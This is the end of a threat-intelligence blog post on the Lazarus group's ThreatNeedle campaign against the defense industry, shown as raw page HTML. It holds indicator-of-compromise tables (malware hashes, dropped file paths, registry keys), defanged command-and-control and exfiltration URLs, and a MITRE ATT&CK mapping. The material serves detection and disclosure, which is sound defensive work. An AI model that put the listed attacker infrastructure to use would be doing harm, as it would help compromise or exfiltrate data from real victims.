https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145858/lazarus_threatneedle_20-300x59.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145858/lazarus_threatneedle_20-1024x201.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145858/lazarus_threatneedle_20-768x151.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145858/lazarus_threatneedle_20-1536x301.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145858/lazarus_threatneedle_20-892x175.png 892w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145858/lazarus_threatneedle_20-370x73.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145858/lazarus_threatneedle_20-1427x280.png 1427w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145858/lazarus_threatneedle_20-800x157.png 800w" sizes="auto, (max-width: 1774px) 100vw, 1774px" /></a></p> <p style="text-align: center"><strong><em>Same tunneling tool</em></strong></p> <h3 id="connection-with-bookcode-cluster">Connection with Bookcode cluster</h3> <p>In our previous <a href="https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/">blog</a> about Lazarus group, we mentioned the Bookcode cluster attributed to Lazarus group; and recently the Korea Internet and Security Agency (KISA) also <a href="https://www.krcert.or.kr/data/reportView.do?bulletin_writing_sequence=35471">published</a> a report about the operation. In the report, they mentioned a malware cluster named LPEClient used for profiling hosts and fetching next stage payloads. While investigating this incident, we also found LPEClient from the host infected with ThreatNeedle. So, we assess that the ThreatNeedle cluster is connected to the Bookcode operation.</p> <h2 id="conclusions">Conclusions</h2> <p>In recent years, the Lazarus group has focused on attacking financial institutions around the world. However, beginning in early 2020, they focused on aggressively attacking the defense industry. While Lazarus has also previously utilized the ThreatNeedle malware used in this attack when targeting cryptocurrency businesses, it is currently being actively used in cyberespionage attacks.</p> <p>This investigation allowed us to create strong ties between multiple campaigns that Lazarus has conducted, reinforcing our attribution. In this campaign the Lazarus group demonstrated its sophistication level and ability to circumvent the security measures they face during their attacks, such as network segmentation. We assess that Lazarus is a highly prolific group, conducting several campaigns using different strategies. They shared tools and infrastructure among these campaigns to accomplish their goals.</p> <p><em>Kaspersky ICS CERT would like to thank Vasily Berdnikov (Kaspersky targeted attacks research group) for his help.</em></p> <h2 id="appendix-i-indicators-of-compromise">Appendix I – Indicators of Compromise</h2> <p><strong>Malicious documents</strong></p> <table border="0"> <tbody> <tr> <td><a href="https://opentip.kaspersky.com/e7aa0237fc3db67a96ebd877806a2c88/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">e7aa0237fc3db67a96ebd877806a2c88</a></td> <td>Boeing_AERO_GS.docx</td> </tr> </tbody> </table> <p><strong>Installer</strong></p> <table border="0"> <tbody> <tr> <td><a href="https://opentip.kaspersky.com/b191cc4d73a247afe0a62a8c38dc9137/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">b191cc4d73a247afe0a62a8c38dc9137</a></td> <td>%APPDATA%\Microsoft\DRM\logon.bin</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/9e440e231ef2c62c78147169a26a1bd3/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">9e440e231ef2c62c78147169a26a1bd3</a></td> <td>C:\ProgramData\ntnser.bin</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/b7cc295767c1d8c6c68b1bb6c4b4214f/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">b7cc295767c1d8c6c68b1bb6c4b4214f</a></td> <td>C:\ProgramData\ntnser.bin</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/0f967343e50500494cf3481ce4de698c/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">0f967343e50500494cf3481ce4de698c</a></td> <td>C:\ProgramData\Microsoft\MSDN\msdn.bin</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/09aa1427f26e7dd48955f09a9c604564/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">09aa1427f26e7dd48955f09a9c604564</a></td> <td>%APPDATA\Microsoft\info.dat</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/07b22533d08f32d48485a521dbc1974d/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">07b22533d08f32d48485a521dbc1974d</a></td> <td>C:\ProgramData\adobe\load.dat</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/1c5e4d60a1041cf2903817a31c1fa212/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">1c5e4d60a1041cf2903817a31c1fa212</a></td> <td>C:\ProgramData\Adobe\adobe.tmp</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/4cebc83229a40c25434c51ee3d6be13e/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">4cebc83229a40c25434c51ee3d6be13e</a></td> <td>C:\ProgramData\Adobe\up.tmp</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/23b04b18c75aa7d286fea5d28d41a830/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">23b04b18c75aa7d286fea5d28d41a830</a></td> <td>%APPDATA%\Microsoft\DRM\logon.dat</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/319ace20f6ffd39b7fff1444f73c9f5d/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">319ace20f6ffd39b7fff1444f73c9f5d</a></td> <td>%APPDATA%\Microsoft\DRM\logon.bin</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/45c0a6e13cad26c69eff59fded88ef36/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">45c0a6e13cad26c69eff59fded88ef36</a></td> <td>%APPDATA%\Microsoft\DRM\logon.dat</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/486f25db5ca980ef4a7f6dfbf9e2a1ad/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">486f25db5ca980ef4a7f6dfbf9e2a1ad</a></td> <td>C:\ProgramData\ntusers.dat</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/1333967486d3ab50d768fb745dae9af5/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">1333967486d3ab50d768fb745dae9af5</a></td> <td>C:\PerfLogs\log.bin</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/07b22533d08f32d48485a521dbc1974d/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">07b22533d08f32d48485a521dbc1974d</a></td> <td>C:\ProgramData\Adobe\load.dat</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/c86d0a2fa9c4ef59aa09e2435b4ab70c/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">c86d0a2fa9c4ef59aa09e2435b4ab70c</a></td> <td>%TEMP%\ETS4659.tmp</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/69d71f06fbfe177fb1a5f57b9c3ae587/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">69d71f06fbfe177fb1a5f57b9c3ae587</a></td> <td>%APPDATA%\Microsoft\Windows\shsvcs.db</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/7bad67dcaf269f9ee18869e5ef6b2dc1/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">7bad67dcaf269f9ee18869e5ef6b2dc1</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/956e5138940a4f44d1c2c24f122966bd/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">956e5138940a4f44d1c2c24f122966bd</a></td> <td>%APPDATA%\ntuser.bin</td> </tr> </tbody> </table> <p><strong>Loader</strong></p> <table border="0"> <tbody> <tr> <td><a href="https://opentip.kaspersky.com/ed627b7bbf7ea78c343e9fb99783c62b/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">ed627b7bbf7ea78c343e9fb99783c62b</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/1a17609b7df20dcb3bd1b71b7cb3c674/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">1a17609b7df20dcb3bd1b71b7cb3c674</a></td> <td>%ALLUSERSPROFILE%\ntuser.bin</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/fa9635b479a79a3e3fba3d9e65b842c3/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">fa9635b479a79a3e3fba3d9e65b842c3</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/3758bda17b20010ff864575b0ccd9e50/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">3758bda17b20010ff864575b0ccd9e50</a></td> <td>%SYSTEMROOT%\system\mraudio.drv</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/cbcf15e272c422b029fcf1b82709e333/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">cbcf15e272c422b029fcf1b82709e333</a></td> <td>%SYSTEMROOT%\system\mraudio.drv</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/9cb513684f1024bea912e539e482473a/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">9cb513684f1024bea912e539e482473a</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/36ab0902797bd18acd6880040369731c/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">36ab0902797bd18acd6880040369731c</a></td> <td>%SYSTEMROOT%\LogonHours.sys</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/db35391857bcf7b0fa17dbbed97ad269/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">db35391857bcf7b0fa17dbbed97ad269</a></td> <td>%ALLUSERSPROFILE%\Adobe\update.tmp</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/be4c927f636d2ae88a1e0786551bf3c4/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">be4c927f636d2ae88a1e0786551bf3c4</a></td> <td>%ALLUSERSPROFILE%\Adobe\unpack.tmp</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/728948c66582858f6a3d3136c7fbe84a/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">728948c66582858f6a3d3136c7fbe84a</a></td> <td>%APPDATA%\Microsoft\IBM.DAT</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/06af39b9954dfe9ac5e4ec397a3003fb/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">06af39b9954dfe9ac5e4ec397a3003fb</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/29c5eb3f17273383782c716754a3025a/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">29c5eb3f17273383782c716754a3025a</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/79d58b6e850647024fea1c53e997a3f6/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">79d58b6e850647024fea1c53e997a3f6</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/e604185ee40264da4b7d10fdb6c7ab5e/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">e604185ee40264da4b7d10fdb6c7ab5e</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/2a73d232334e9956d5b712cc74e01753/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">2a73d232334e9956d5b712cc74e01753</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/1a17609b7df20dcb3bd1b71b7cb3c674/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">1a17609b7df20dcb3bd1b71b7cb3c674</a></td> <td>%ALLUSERSPROFILE%\ntuser.bin</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/459be1d21a026d5ac3580888c8239b07/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">459be1d21a026d5ac3580888c8239b07</a></td> <td>%ALLUSERSPROFILE%\ntuser.bin</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/87fb7be83eff9bea0d6cc95d68865564/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">87fb7be83eff9bea0d6cc95d68865564</a></td> <td>%SYSTEMROOT%\SysWOW64\wmdmpmsp.sys</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/062a40e74f8033138d19aa94f0d0ed6e/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">062a40e74f8033138d19aa94f0d0ed6e</a></td> <td>%APPDATA%\microsoft\OutIook.db</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/9b17f0db7aeff5d479eaee8056b9ac09/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">9b17f0db7aeff5d479eaee8056b9ac09</a></td> <td>%TEMP%\ETS4658.tmp, %APPDATA%\Temp\BTM0345.tmp</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/9b17f0db7aeff5d479eaee8056b9ac09/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">9b17f0db7aeff5d479eaee8056b9ac09</a></td> <td>%APPDATA%\Temp\BTM0345.tmp</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/420d91db69b83ac9ca3be23f6b3a620b/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">420d91db69b83ac9ca3be23f6b3a620b</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/238e31b562418c236ed1a0445016117c/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">238e31b562418c236ed1a0445016117c</a></td> <td>%APPDATA%\Microsoft\Windows\lconcaches.db, %TEMP%\cache.db</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/36ab0902797bd18acd6880040369731c/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">36ab0902797bd18acd6880040369731c</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/238e31b562418c236ed1a0445016117c/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">238e31b562418c236ed1a0445016117c</a></td> <td>%TEMP%\cache.db, %APPDATA%\Microsoft\Windows\lconcaches.db</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/ad1a93d6e6b8a4f6956186c213494d17/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">ad1a93d6e6b8a4f6956186c213494d17</a></td> <td>%APPDATA%\Microsoft\Windows\shsvcs.db</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/c34d5d2cc857b6ee9038d8bb107800f1/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">c34d5d2cc857b6ee9038d8bb107800f1</a></td> <td> </td> </tr> </tbody> </table> <p><strong>Registry Loader</strong></p> <table border="0"> <tbody> <tr> <td><a href="https://opentip.kaspersky.com/16824dfd4a380699f3841a6fa7e52c6d/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">16824dfd4a380699f3841a6fa7e52c6d</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/aa74ed16b0057b31c835a5ef8a105942/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">aa74ed16b0057b31c835a5ef8a105942</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/85621411e4c80897c588b5df53d26270/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">85621411e4c80897c588b5df53d26270</a></td> <td>%SYSTEMROOT%\system\avimovie.dll</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/a611d023dfdd7ca1fab07f976d2b6629/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">a611d023dfdd7ca1fab07f976d2b6629</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/160d0e396bf8ec87930a5df46469a960/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">160d0e396bf8ec87930a5df46469a960</a></td> <td>%WINDIR%\winhelp.dll</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/110e1c46fd9a39a1c86292487994e5bd/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">110e1c46fd9a39a1c86292487994e5bd</a></td> <td> </td> </tr> </tbody> </table> <p><strong>Downloader</strong></p> <table border="0"> <tbody> <tr> <td><a href="https://opentip.kaspersky.com/ac86d95e959452d189e30fa6ded05069/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">ac86d95e959452d189e30fa6ded05069</a></td> <td>%APPDATA%\Microsoft\thumbnails.db</td> </tr> </tbody> </table> <p><strong>Trojanized VNC Uploader</strong></p> <table border="0"> <tbody> <tr> <td><a href="https://opentip.kaspersky.com/bea90d0ef40a657cb291d25c4573768d/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">bea90d0ef40a657cb291d25c4573768d</a></td> <td>%ALLUSERSPROFILE%\adobe\arm86.dat</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/254a7a0c1db2bea788ca826f4b5bf51a/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">254a7a0c1db2bea788ca826f4b5bf51a</a></td> <td>%APPDATA%\PBL\user.tmp, %APPDATA%\Comms\Comms.dat</td> </tr> </tbody> </table> <p><strong>Tunneling Tool</strong></p> <table border="0"> <tbody> <tr> <td><a href="https://opentip.kaspersky.com/6f0c7cbd57439e391c93a2101f958ccd/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">6f0c7cbd57439e391c93a2101f958ccd</a></td> <td>%APPDATA\PBL\update.tmp</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/fc9e7dc13ce7edc590ef7dfce12fe017/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">fc9e7dc13ce7edc590ef7dfce12fe017</a></td> <td> </td> </tr> </tbody> </table> <p><strong>LPEClient</strong></p> <table border="0"> <tbody> <tr> <td><a href="https://opentip.kaspersky.com/0aceeb2d38fe8b5ef2899dd6b80bfc08/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">0aceeb2d38fe8b5ef2899dd6b80bfc08</a></td> <td>%TEMP%\ETS5659.tmp</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/09580ea6f1fe941f1984b4e1e442e0a5/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL">09580ea6f1fe941f1984b4e1e442e0a5</a></td> <td>%TEMP%\ETS4658.tmp</td> </tr> </tbody> </table> <p><strong>File path</strong><br /> %SYSTEMROOT%\system32\bcdbootinfo.tlp<br /> %SYSTEMROOT%\system32\Nwsapagent.sys<br /> %SYSTEMROOT%\system32\SRService.sys<br /> %SYSTEMROOT%\system32\NWCWorkstation.sys<br /> %SYSTEMROOT%\system32\WmdmPmSp.sys<br /> %SYSTEMROOT%\system32\PCAudit.sys<br /> %SYSTEMROOT%\system32\helpsvc.sys</p> <p><strong>Registry Path</strong><br /> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\GameConfig &#8211; Description<br /> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig &#8211; SubVersion</p> <p><strong>Domains and IPs</strong><br /> hxxp://forum.iron-maiden[.]ru/core/cache/index[.]php<br /> hxxp://www.au-pair[.]org/admin/Newspaper[.]asp<br /> hxxp://www.au-pair[.]org/admin/login[.]asp<br /> hxxp://www.colasprint[.]com/_vti_log/upload[.]asp<br /> hxxp://www.djasw.or[.]kr/sub/popup/images/upfiles[.]asp<br /> hxxp://www.kwwa[.]org/popup/160307/popup_160308[.]asp<br /> hxxp://www.kwwa[.]org/DR6001/FN6006LS[.]asp<br /> hxxp://www.sanatoliacare[.]com/include/index[.]asp<br /> hxxps://americanhotboats[.]com/forums/core/cache/index[.]php<br /> hxxps://docentfx[.]com/wp-admin/includes/upload[.]php<br /> hxxps://kannadagrahakarakoota[.]org/forums/admincp/upload[.]php<br /> hxxps://polyboatowners[.]com/2010/images/BOTM/upload[.]php<br /> hxxps://ryanmcbain[.]com/forum/core/cache/upload[.]php<br /> hxxps://shinwonbook.co[.]kr/basket/pay/open[.]asp<br /> hxxps://shinwonbook.co[.]kr/board/editor/upload[.]asp<br /> hxxps://theforceawakenstoys[.]com/vBulletin/core/cache/upload[.]php<br /> hxxps://www.automercado.co[.]cr/empleo/css/main[.]jsp<br /> hxxps://www.curiofirenze[.]com/include/inc-site[.]asp<br /> hxxps://www.digitaldowns[.]us/artman/exec/upload[.]php<br /> hxxps://www.digitaldowns[.]us/artman/exec/upload[.]php<br /> hxxps://www.dronerc[.]it/forum/uploads/index[.]php<br /> hxxps://www.dronerc[.]it/shop_testbr/Adapter/Adapter_Config[.]php<br /> hxxps://www.edujikim[.]com/intro/blue/view[.]asp<br /> hxxps://www.edujikim[.]com/pay/sample/INIstart[.]asp<br /> hxxps://www.edujikim[.]com/smarteditor/img/upload[.]asp<br /> hxxps://www.fabioluciani[.]com/ae/include/constant[.]asp<br /> hxxps://www.fabioluciani[.]com/es/include/include[.]asp<br /> hxxp://www.juvillage.co[.]kr/img/upload[.]asp<br /> hxxps://www.lyzeum[.]com/board/bbs/bbs_read[.]asp<br /> hxxps://www.lyzeum[.]com/images/board/upload[.]asp<br /> hxxps://martiancartel[.]com/forum/customavatars/avatars[.]php<br /> hxxps://www.polyboatowners[.]com/css/index[.]php<br /> hxxps://www.sanlorenzoyacht[.]com/newsl/include/inc-map[.]asp<br /> hxxps://www.raiestatesandbuilders[.]com/admin/installer/installer/index[.]php<br /> hxxp://156.245.16[.]55/admin/admin[.]asp<br /> hxxp://fredrikarnell[.]com/marocko2014/index[.]php<br /> hxxp://roit.co[.]kr/xyz/mainpage/view[.]asp</p> <p><strong>Second stage C2 address</strong><br /> hxxps://www.waterdoblog[.]com/uploads/index[.]asp<br /> hxxp://www.kbcwainwrightchallenge.org[.]uk/connections/dbconn[.]asp</p> <p><strong>C2 URLs to exfiltrate files used by Trojanized VNC Uploader</strong><br /> hxxps://prototypetrains[.]com:443/forums/core/cache/index[.]php<br /> hxxps://newidealupvc[.]com:443/img/prettyPhoto/jquery.max[.]php<br /> hxxps://mdim.in[.]ua:443/core/cache/index[.]php<br /> hxxps://forum.snowreport[.]gr:443/cache/template/upload[.]php<br /> hxxps://www.gonnelli[.]it/uploads/catalogo/thumbs/thumb[.]asp<br /> hxxps://www.dellarocca[.]net/it/content/img/img[.]asp<br /> hxxps://www.astedams[.]it/photos/image/image[.]asp<br /> hxxps://www.geeks-board[.]com/blog/wp-content/uploads/2017/cache[.]php<br /> hxxps://cloudarray[.]com/images/logo/videos/cache[.]jsp</p> <h2 id="appendix-ii-mitre-attck-mapping">Appendix II – MITRE ATT&amp;CK Mapping</h2> <table> <tbody> <tr> <td style="background-color: black;color: white;text-align: center"><strong>Tactic</strong></td> <td style="background-color: black;color: white;text-align: center"><strong>Technique</strong></td> <td style="background-color: black;color: white;text-align: center"><strong>Technique Name</strong></td> </tr> <tr> <td style="background-color: grey"><strong>Initial Access</strong></td> <td style="background-color: lightgrey"><strong>T1566.002</strong></td> <td style="background-color: lightgrey"><strong>Phishing: Spearphishing Link</strong></td> </tr> <tr> <td style="background-color: grey"> <strong>Execution</strong></td> <td style="background-color: lightgrey"><strong>T1059.003</strong><br /> <strong>T1204.002</strong><br /> <strong>T1569.002</strong></td> <td style="background-color: lightgrey"> <strong>Command and Scripting Interpreter: Windows Command Shell</strong><br /> <strong>User Execution: Malicious File</strong><br /> <strong>System Services: Service Execution</strong></td> </tr> <tr> <td style="background-color: grey"><strong>Persistence</strong></td> <td style="background-color: lightgrey"><strong>T1543.003</strong><br /> <strong>T1547.001</strong></td> <td style="background-color: lightgrey"> <strong>Create or Modify System Process: Windows Service</strong><br /> <strong>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</strong></td> </tr> <tr> <td style="background-color: grey"><strong>Privilege Escalation</strong></td> <td style="background-color: lightgrey"><strong>T1543.003</strong></td> <td style="background-color: lightgrey"><strong>Create or Modify System Process: Windows Service</strong></td> </tr> <tr> <td style="background-color: grey"> <strong>Defense Evasion</strong></td> <td style="background-color: lightgrey"> <strong>T1140</strong><br /> <strong>T1070.002</strong><br /> <strong>T1070.003</strong><br /> <strong>T1070.004</strong><br /> <strong>T1036.003</strong><br /> <strong>T1036.004</strong><br /> <strong>T1112</strong></td> <td style="background-color: lightgrey"> <strong>Deobfuscate/Decode Files or Information</strong><br /> <strong>Clear Linux or Mac System Logs</strong><br /> <strong>Clear Command History</strong><br /> <strong>File Deletion</strong><br /> <strong>Masquerading: Rename System Utilities</strong><br /> <strong>Masquerading: Masquerade Task or Service</strong><br /> <strong>Modify Registry</strong></td> </tr> <tr> <td style="background-color: grey"><strong>Credential Access</strong></td> <td style="background-color: lightgrey"><strong>T1557.001</strong></td> <td style="background-color: lightgrey"><strong>LLMNR/NBT-NS Poisoning and SMB Relay</strong></td> </tr> <tr> <td style="background-color: grey"> <strong>Discovery</strong></td> <td style="background-color: lightgrey"> <strong>T1135</strong><br /> <strong>T1057</strong><br /> <strong>T1016</strong><br /> <strong>T1033</strong><br /> <strong>T1049</strong><br /> <strong>T1082</strong><br /> <strong>T1083</strong><br /> <strong>T1007</strong></td> <td style="background-color: lightgrey"> <strong>Network Share Discovery</strong><br /> <strong>Process Discovery</strong><br /> <strong>System Network Configuration Discovery</strong><br /> <strong>System Owner/User Discovery</strong><br /> <strong>System Network Connections Discovery</strong><br /> <strong>System Information Discovery</strong><br /> <strong>File and Directory Discovery</strong><br /> <strong>System Service Discovery</strong></td> </tr> <tr> <td style="background-color: grey"><strong>Lateral Movement</strong></td> <td style="background-color: lightgrey"><strong>T1021.002</strong></td> <td style="background-color: lightgrey"><strong>SMB/Windows Admin Shares</strong></td> </tr> <tr> <td style="background-color: grey"><strong>Collection</strong></td> <td style="background-color: lightgrey"><strong>T1560.001</strong></td> <td style="background-color: lightgrey"><strong>Archive Collected Data: Archive via Utility</strong></td> </tr> <tr> <td style="background-color: grey"> <strong>Command and Control</strong></td> <td style="background-color: lightgrey"> <strong>T1071.001</strong><br /> <strong>T1132.002</strong><br /> <strong>T1104</strong><br /> <strong>T1572</strong><br /> <strong>T1090.001</strong></td> <td style="background-color: lightgrey"> <strong>Application Layer Protocol: Web Protocols</strong><br /> <strong>Non-Standard Encoding</strong><br /> <strong>Multi-Stage Channels</strong><br /> <strong>Protocol Tunneling</strong><br /> <strong>Internal Proxy</strong></td> </tr> <tr> <td style="background-color: grey"><strong>Exfiltration</strong></td> <td style="background-color: lightgrey"><strong>T1041</strong></td> <td style="background-color: lightgrey"><strong>Exfiltration Over C2 Channel</strong></td> </tr> </tbody> </table> </div> </div> </div> <div class="c-article__footer"> <div class="c-article__categories"> <ul class="c-list-tags"> <li><a href="https://securelist.com/tag/apt/" class="c-link-tag"><span>APT</span></a></li> <li><a href="https://securelist.com/tag/lazarus/" class="c-link-tag"><span>Lazarus</span></a></li> <li><a href="https://securelist.com/tag/macros/" class="c-link-tag"><span>Macros</span></a></li> <li><a href="https://securelist.com/tag/malware-descriptions/" class="c-link-tag"><span>Malware Descriptions</span></a></li> <li><a href="https://securelist.com/tag/malware-technologies/" class="c-link-tag"><span>Malware Technologies</span></a></li> <li><a href="https://securelist.com/tag/microsoft-office/" class="c-link-tag"><span>Microsoft Office</span></a></li> <li><a href="https://securelist.com/tag/spear-phishing/" class="c-link-tag"><span>Spear phishing</span></a></li> </ul> </div> <div class="c-article__authors u-hidden@md"> <p class="c-title--extra-small">Authors</p> <ul class="c-list-authors"> <li> <a href="https://securelist.com/author/vyacheslavkopeytsev/" > <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/avatar-default/avatar_default_2.png"> <span>Vyacheslav Kopeytsev</span></a> </li> <li> <a href="https://securelist.com/author/seongsupark/" > <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/avatar-default/avatar_default_1.png"> <span>Seongsu Park</span></a> </li> </ul> </div> </div> <div id="comments" class="entry-comments c-article__comments js-comments-wrapper"> <p class="c-title--extra-small">Lazarus targets defense industry with ThreatNeedle</p> <div id="respond" class="comment-respond"> <h3 id="reply-title" class="u-hidden"> <small></small></h3><form action="https://securelist.com/wp-comments-post.php" method="post" id="loginform" class="comment-form"><p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> <span class="required-field-message">Required fields are marked <span class="required">*</span></span></p><div class="comment-form-comment"><textarea id="comment" name="comment" style="width:100%" rows="8" aria-required="true" placeholder="Type your comment here"></textarea></div><!-- .comment-form-comment --><p class="comment-form-author"><label for="author">Name <span class="required">*</span></label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" autocomplete="name" required="required" /></p> <p class="comment-form-email"><label for="email">Email <span class="required">*</span></label> <input id="email" name="email" type="text" value="" size="30" maxlength="100" aria-describedby="email-notes" autocomplete="email" required="required" /></p> <script type="text/javascript"> document.addEventListener("input", function (event) { if (!event.target.closest("#comment")) return; try{ grecaptcha.render("recaptcha-submit-btn-area", { "sitekey" : "6LfQdrAaAAAAAEb_rTrwlbyc8z0Fa9CMjELY_2Ts", "theme" : "standard" }); }catch(error){/*possible duplicated instances*/} }); </script> <script src="https://www.google.com/recaptcha/api.js?hl=en&render=explicit" async defer></script> <div id="recaptcha-submit-btn-area">&nbsp;</div> <noscript> <style type="text/css">#form-submit-save {display:none;}</style> <input name="submit" type="submit" id="submit-alt" tabindex="6" value="Submit Comment"/> </noscript> <p class="form-submit"><input name="submit" type="submit" id="commentsubmit" class="submit" value="Comment" /><a rel="nofollow" id="cancel-comment-reply-link" href="/lazarus-threatneedle/100803/#respond" style="display:none;">Cancel</a> <input type='hidden' name='comment_post_ID' 